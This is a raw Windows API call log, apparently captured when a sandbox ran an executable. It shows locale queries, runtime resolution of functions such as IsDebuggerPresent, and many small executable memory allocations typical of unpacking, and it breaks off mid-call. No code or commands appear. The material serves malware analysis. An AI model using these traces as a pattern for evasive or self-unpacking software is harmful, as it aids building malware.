GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Jun") returned 4 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd04, cchData=256 | out: lpLCData="June") returned 5 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Jul") returned 4 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd04, cchData=256 | out: lpLCData="July") returned 5 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Aug") returned 4 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd04, cchData=256 | out: lpLCData="August") returned 7 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sep") returned 4 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd04, cchData=256 | out: lpLCData="September") returned 10 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Oct") returned 4 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd04, cchData=256 | out: lpLCData="October") returned 8 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Nov") returned 4 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd04, cchData=256 | out: lpLCData="November") returned 9 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Dec") returned 4 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd04, cchData=256 | out: lpLCData="December") returned 9 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sun") returned 4 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sunday") returned 7 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Mon") returned 4 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Monday") returned 7 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Tue") returned 4 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Tuesday") returned 8 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Wed") returned 4 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Wednesday") returned 10 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Thu") returned 4 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Thursday") returned 9 [0260.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Fri") returned 4 [0260.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Friday") returned 7 [0260.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sat") returned 4 [0260.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Saturday") returned 9 [0260.474] GetThreadLocale () returned 0x409 [0260.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fd60, cchData=256 | out: lpLCData="$") returned 2 [0260.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0260.555] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0260.556] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fe58, cchData=2 | out: lpLCData=",") returned 2 [0260.556] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fe58, cchData=2 | out: lpLCData=".") returned 2 [0260.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fd60, cchData=256 | out: lpLCData="2") returned 2 [0260.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fe58, cchData=2 | out: lpLCData="/") returned 2 [0260.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fd60, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0260.556] GetThreadLocale () returned 0x409 [0260.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd30, cchData=256 | out: lpLCData="1") returned 2 [0260.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fd60, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0260.556] GetThreadLocale () returned 0x409 [0260.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd30, cchData=256 | out: lpLCData="1") returned 2 [0260.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fe58, cchData=2 | out: lpLCData=":") returned 2 [0260.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fd60, cchData=256 | out: lpLCData="AM") returned 3 [0260.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fd60, cchData=256 | out: lpLCData="PM") returned 3 [0260.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0260.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0260.556] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0260.556] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fe58, cchData=2 | out: lpLCData=",") returned 2 [0260.556] GetVersionExA (in: lpVersionInformation=0x18fe2c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x201030c, dwMinorVersion=0x20102fc, dwBuildNumber=0x30, dwPlatformId=0x1fb22c9, szCSDVersion="Äþ\x18") | out: lpVersionInformation=0x18fe2c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0260.557] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0260.557] GetProcAddress (hModule=0x769b0000, lpProcName="GetDiskFreeSpaceExA") returned 0x76a448ef [0260.586] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x18fd40 | out: lpWSAData=0x18fd40) returned 0 [0260.724] GetCurrentThreadId () returned 0xc84 [0260.733] VirtualAlloc (lpAddress=0x2014000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x2014000 [0260.961] GetLocalTime (in: lpSystemTime=0x18feb8 | out: lpSystemTime=0x18feb8*(wYear=0x7e5, wMonth=0xc, wDayOfWeek=0x1, wDay=0x1b, wHour=0x17, wMinute=0xb, wSecond=0x3b, wMilliseconds=0x132)) [0260.961] GetSystemTime (in: lpSystemTime=0x18feb4 | out: lpSystemTime=0x18feb4*(wYear=0x7e5, wMonth=0xc, wDayOfWeek=0x1, wDay=0x1b, wHour=0x16, wMinute=0xb, wSecond=0x3b, wMilliseconds=0x132)) [0260.972] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xc8 [0260.973] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0260.973] GetCurrentProcess () returned 0xffffffff [0260.973] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x18ff00, lpSystemAffinityMask=0x18fefc | out: lpProcessAffinityMask=0x18ff00, lpSystemAffinityMask=0x18fefc) returned 1 [0260.983] VirtualAlloc (lpAddress=0x2038000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x2038000 [0261.125] VirtualFree (lpAddress=0x2058000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0261.133] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0261.134] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0261.134] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryA") returned 0x769c498f [0261.134] GetProcAddress (hModule=0x769b0000, lpProcName="MapViewOfFile") returned 0x769c18d1 [0261.134] GetProcAddress (hModule=0x769b0000, lpProcName="FindResourceA") returned 0x769de98b [0261.134] GetProcAddress (hModule=0x769b0000, lpProcName="IsBadReadPtr") returned 0x769ed065 [0261.134] GetProcAddress (hModule=0x769b0000, lpProcName="UnmapViewOfFile") returned 0x769c1806 [0261.134] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0261.134] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileMappingA") returned 0x769c54be [0261.135] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0261.135] GetProcAddress (hModule=0x769b0000, lpProcName="IsDebuggerPresent") returned 0x769c4a15 [0261.135] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTime") returned 0x769c5a4e [0261.137] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0261.137] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0261.137] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcessId") returned 0x769c11f8 [0261.137] LoadLibraryA (lpLibFileName="NTDLL.DLL") returned 0x779e0000 [0261.137] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x76c20000 [0261.137] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0261.138] GetProcAddress (hModule=0x769b0000, lpProcName="RaiseException") returned 0x769c585e [0261.138] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0261.138] GetProcAddress (hModule=0x769b0000, lpProcName="SetLastError") returned 0x769c11a9 [0261.138] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x1000, flProtect=0x40) returned 0x290000 [0261.138] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x1000, flProtect=0x40) returned 0x2a0000 [0261.139] VirtualAlloc (lpAddress=0x2058000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x2058000 [0261.145] VirtualAlloc (lpAddress=0x0, dwSize=0xbb, flAllocationType=0x1000, flProtect=0x40) returned 0x2b0000 [0261.145] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x2c0000 [0261.145] VirtualAlloc (lpAddress=0x0, dwSize=0x83, flAllocationType=0x1000, flProtect=0x40) returned 0x2d0000 [0261.145] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x2e0000 [0261.146] VirtualAlloc (lpAddress=0x0, dwSize=0x437, flAllocationType=0x1000, flProtect=0x40) returned 0x2f0000 [0261.146] VirtualAlloc (lpAddress=0x0, dwSize=0x1c9, flAllocationType=0x1000, flProtect=0x40) returned 0x9c0000 [0261.146] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x1000, flProtect=0x40) returned 0x9d0000 [0261.147] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x9e0000 [0261.147] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x9f0000 [0261.147] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0xa00000 [0261.148] GetCurrentProcessId () returned 0xc88 [0261.148] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2110000 [0261.148] VirtualAlloc (lpAddress=0x0, dwSize=0xbf, flAllocationType=0x1000, flProtect=0x40) returned 0x2120000 [0261.148] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x2130000 [0261.149] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x2140000 [0261.149] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x2150000 [0261.149] VirtualAlloc (lpAddress=0x0, dwSize=0x89, flAllocationType=0x1000, flProtect=0x40) returned 0x2160000 [0261.149] VirtualAlloc (lpAddress=0x0, dwSize=0xd4, flAllocationType=0x1000, flProtect=0x40) returned 0x2170000 [0261.150] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x2180000 [0261.150] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x1000, flProtect=0x40) returned 0x2190000 [0261.150] VirtualAlloc (lpAddress=0x0, dwSize=0x17c, flAllocationType=0x1000, flProtect=0x40) returned 0x21a0000 [0261.152] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x25a0000 [0261.152] VirtualAlloc (lpAddress=0x2080000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2080000 [0261.153] GetCurrentProcessId () returned 0xc88 [0261.153] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x25b0000 [0261.153] VirtualAlloc (lpAddress=0x0, dwSize=0x284, flAllocationType=0x1000, flProtect=0x40) returned 0x25c0000 [0261.153] VirtualAlloc (lpAddress=0x0, dwSize=0x37d, flAllocationType=0x1000, flProtect=0x40) returned 0x25d0000 [0261.154] VirtualAlloc (lpAddress=0x0, dwSize=0xb9, flAllocationType=0x1000, flProtect=0x40) returned 0x25e0000 [0261.154] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x1000, flProtect=0x40) returned 0x25f0000 [0261.154] VirtualAlloc (lpAddress=0x0, dwSize=0x91, flAllocationType=0x1000, flProtect=0x40) returned 0x2600000 [0261.155] VirtualAlloc (lpAddress=0x0, dwSize=0x87, flAllocationType=0x1000, flProtect=0x40) returned 0x2610000 [0261.155] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x2620000 [0261.155] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x2630000 [0261.156] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2640000 [0261.156] VirtualAlloc (lpAddress=0x0, dwSize=0xb9, flAllocationType=0x1000, flProtect=0x40) returned 0x2650000 [0261.156] GetCurrentProcessId () returned 0xc88 [0261.156] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2660000 [0261.157] VirtualAlloc (lpAddress=0x0, dwSize=0x149, flAllocationType=0x1000, flProtect=0x40) returned 0x2670000 [0261.157] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x2680000 [0261.157] VirtualAlloc (lpAddress=0x0, dwSize=0x11d, flAllocationType=0x1000, flProtect=0x40) returned 0x2690000 [0261.158] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x1000, flProtect=0x40) returned 0x26a0000 [0261.158] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x26b0000 [0261.159] VirtualAlloc (lpAddress=0x0, dwSize=0xad, flAllocationType=0x1000, flProtect=0x40) returned 0x26c0000 [0261.159] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x26d0000 [0261.159] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x26e0000 [0261.160] VirtualAlloc (lpAddress=0x0, dwSize=0x3b1, flAllocationType=0x1000, flProtect=0x40) returned 0x26f0000 [0261.160] VirtualAlloc (lpAddress=0x0, dwSize=0xab, flAllocationType=0x1000, flProtect=0x40) returned 0x2700000 [0261.161] GetCurrentProcessId () returned 0xc88 [0261.161] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2710000 [0261.161] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x2720000 [0261.161] VirtualAlloc (lpAddress=0x0, dwSize=0xb1, flAllocationType=0x1000, flProtect=0x40) returned 0x2730000 [0261.162] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x2740000 [0261.162] VirtualAlloc (lpAddress=0x0, dwSize=0x1df, flAllocationType=0x1000, flProtect=0x40) returned 0x2750000 [0261.163] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x1000, flProtect=0x40) returned 0x2760000 [0261.163] VirtualAlloc (lpAddress=0x0, dwSize=0x189, flAllocationType=0x1000, flProtect=0x40) returned 0x2770000 [0261.163] VirtualAlloc (lpAddress=0x0, dwSize=0x483, flAllocationType=0x1000, flProtect=0x40) returned 0x2780000 [0261.164] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x1000, flProtect=0x40) returned 0x2790000 [0261.164] VirtualAlloc (lpAddress=0x0, dwSize=0x247, flAllocationType=0x1000, flProtect=0x40) returned 0x27a0000 [0261.164] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x27b0000 [0261.165] GetCurrentProcessId () returned 0xc88 [0261.165] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x27c0000 [0261.165] VirtualAlloc (lpAddress=0x0, dwSize=0xe2, flAllocationType=0x1000, flProtect=0x40) returned 0x27d0000 [0261.165] VirtualAlloc (lpAddress=0x0, dwSize=0x89, flAllocationType=0x1000, flProtect=0x40) returned 0x27e0000 [0261.166] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x27f0000 [0261.256] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x2800000 [0261.257] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x1000, flProtect=0x40) returned 0x2810000 [0261.257] VirtualAlloc (lpAddress=0x0, dwSize=0x95, flAllocationType=0x1000, flProtect=0x40) returned 0x2820000 [0261.258] VirtualAlloc (lpAddress=0x0, dwSize=0xcc, flAllocationType=0x1000, flProtect=0x40) returned 0x2830000 [0261.258] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x1000, flProtect=0x40) returned 0x2840000 [0261.258] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x2850000 [0261.259] VirtualAlloc (lpAddress=0x0, dwSize=0xa7, flAllocationType=0x1000, flProtect=0x40) returned 0x2860000 [0261.259] GetCurrentProcessId () returned 0xc88 [0261.259] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2870000 [0261.260] VirtualAlloc (lpAddress=0x0, dwSize=0xd1, flAllocationType=0x1000, flProtect=0x40) returned 0x2880000 [0261.260] VirtualAlloc (lpAddress=0x0, dwSize=0xbb, flAllocationType=0x1000, flProtect=0x40) returned 0x2890000 [0261.261] VirtualAlloc (lpAddress=0x0, dwSize=0xa7, flAllocationType=0x1000, flProtect=0x40) returned 0x28a0000 [0261.261] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x1000, flProtect=0x40) returned 0x28b0000 [0261.262] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x28c0000 [0261.262] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x28d0000 [0261.262] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x28e0000 [0261.263] VirtualAlloc (lpAddress=0x0, dwSize=0x17e, flAllocationType=0x1000, flProtect=0x40) returned 0x28f0000 [0261.263] VirtualAlloc (lpAddress=0x0, dwSize=0x1b1, flAllocationType=0x1000, flProtect=0x40) returned 0x2900000 [0261.264] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x2910000 [0261.264] VirtualAlloc (lpAddress=0x2084000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2084000 [0261.265] GetCurrentProcessId () returned 0xc88 [0261.265] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2920000 [0261.265] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x1000, flProtect=0x40) returned 0x2930000 [0261.266] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x2940000 [0261.266] VirtualAlloc (lpAddress=0x0, dwSize=0xbb, flAllocationType=0x1000, flProtect=0x40) returned 0x2950000 [0261.267] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x1000, flProtect=0x40) returned 0x2960000 [0261.267] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2970000 [0261.267] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x1000, flProtect=0x40) returned 0x2980000 [0261.268] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x2990000 [0261.268] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x1000, flProtect=0x40) returned 0x29a0000 [0261.269] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x1000, flProtect=0x40) returned 0x29b0000 [0261.269] VirtualAlloc (lpAddress=0x0, dwSize=0x328, flAllocationType=0x1000, flProtect=0x40) returned 0x29c0000 [0261.270] GetCurrentProcessId () returned 0xc88 [0261.270] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x29d0000 [0261.270] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x29e0000 [0261.271] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x1000, flProtect=0x40) returned 0x29f0000 [0261.271] VirtualAlloc (lpAddress=0x0, dwSize=0x1a2, flAllocationType=0x1000, flProtect=0x40) returned 0x2a00000 [0261.272] VirtualAlloc (lpAddress=0x0, dwSize=0x8d, flAllocationType=0x1000, flProtect=0x40) returned 0x2a10000 [0261.272] VirtualAlloc (lpAddress=0x0, dwSize=0x95, flAllocationType=0x1000, flProtect=0x40) returned 0x2a20000 [0261.272] VirtualAlloc (lpAddress=0x0, dwSize=0x293, flAllocationType=0x1000, flProtect=0x40) returned 0x2a30000 [0261.273] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x1000, flProtect=0x40) returned 0x2a40000 [0261.273] VirtualAlloc (lpAddress=0x0, dwSize=0x14f, flAllocationType=0x1000, flProtect=0x40) returned 0x2a50000 [0261.274] VirtualAlloc (lpAddress=0x0, dwSize=0xc1, flAllocationType=0x1000, flProtect=0x40) returned 0x2a60000 [0261.274] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x2a70000 [0261.275] GetCurrentProcessId () returned 0xc88 [0261.275] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2a80000 [0261.275] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x1000, flProtect=0x40) returned 0x2a90000 [0261.276] VirtualAlloc (lpAddress=0x0, dwSize=0xb1, flAllocationType=0x1000, flProtect=0x40) returned 0x2aa0000 [0261.276] VirtualAlloc (lpAddress=0x0, dwSize=0x1bc, flAllocationType=0x1000, flProtect=0x40) returned 0x2ab0000 [0261.277] VirtualAlloc (lpAddress=0x0, dwSize=0x2c1, flAllocationType=0x1000, flProtect=0x40) returned 0x2ac0000 [0261.277] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x2ad0000 [0261.277] VirtualAlloc (lpAddress=0x0, dwSize=0xdd, flAllocationType=0x1000, flProtect=0x40) returned 0x2ae0000 [0261.278] VirtualAlloc (lpAddress=0x0, dwSize=0x84, flAllocationType=0x1000, flProtect=0x40) returned 0x2af0000 [0261.278] VirtualAlloc (lpAddress=0x0, dwSize=0x95, flAllocationType=0x1000, flProtect=0x40) returned 0x2b00000 [0261.279] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2b10000 [0261.279] VirtualAlloc (lpAddress=0x0, dwSize=0xc3, flAllocationType=0x1000, flProtect=0x40) returned 0x2b20000 [0261.280] VirtualAlloc (lpAddress=0x2088000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2088000 [0261.280] GetCurrentProcessId () returned 0xc88 [0261.280] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2b30000 [0261.281] VirtualAlloc (lpAddress=0x0, dwSize=0xc7, flAllocationType=0x1000, flProtect=0x40) returned 0x2b40000 [0261.281] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x1000, flProtect=0x40) returned 0x2b50000 [0261.282] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x1000, flProtect=0x40) returned 0x2b60000 [0261.282] VirtualAlloc (lpAddress=0x0, dwSize=0xad, flAllocationType=0x1000, flProtect=0x40) returned 0x2b70000 [0261.283] VirtualAlloc (lpAddress=0x0, dwSize=0x272, flAllocationType=0x1000, flProtect=0x40) returned 0x2b80000 [0261.283] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x2b90000 [0261.283] VirtualAlloc (lpAddress=0x0, dwSize=0x8f, flAllocationType=0x1000, flProtect=0x40) returned 0x2ba0000 [0261.284] VirtualAlloc (lpAddress=0x0, dwSize=0xca, flAllocationType=0x1000, flProtect=0x40) returned 0x2bb0000 [0261.284] VirtualAlloc (lpAddress=0x0, dwSize=0xe3, flAllocationType=0x1000, flProtect=0x40) returned 0x2bc0000 [0261.285] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x2bd0000 [0261.285] GetCurrentProcessId () returned 0xc88 [0261.285] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2be0000 [0261.286] VirtualAlloc (lpAddress=0x0, dwSize=0xb3, flAllocationType=0x1000, flProtect=0x40) returned 0x2bf0000 [0261.286] VirtualAlloc (lpAddress=0x0, dwSize=0xe1, flAllocationType=0x1000, flProtect=0x40) returned 0x2c00000 [0261.287] VirtualAlloc (lpAddress=0x0, dwSize=0x7b, flAllocationType=0x1000, flProtect=0x40) returned 0x2c10000 [0261.287] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x1000, flProtect=0x40) returned 0x2c20000 [0261.288] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x2c30000 [0261.288] VirtualAlloc (lpAddress=0x0, dwSize=0x399, flAllocationType=0x1000, flProtect=0x40) returned 0x2c40000 [0261.289] VirtualAlloc (lpAddress=0x0, dwSize=0xa9, flAllocationType=0x1000, flProtect=0x40) returned 0x2c50000 [0261.289] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x1000, flProtect=0x40) returned 0x2c60000 [0261.290] VirtualAlloc (lpAddress=0x0, dwSize=0x133, flAllocationType=0x1000, flProtect=0x40) returned 0x2c70000 [0261.290] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x2c80000 [0261.291] GetCurrentProcessId () returned 0xc88 [0261.485] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2c90000 [0261.486] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x2ca0000 [0261.487] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x1000, flProtect=0x40) returned 0x2cb0000 [0261.487] VirtualAlloc (lpAddress=0x0, 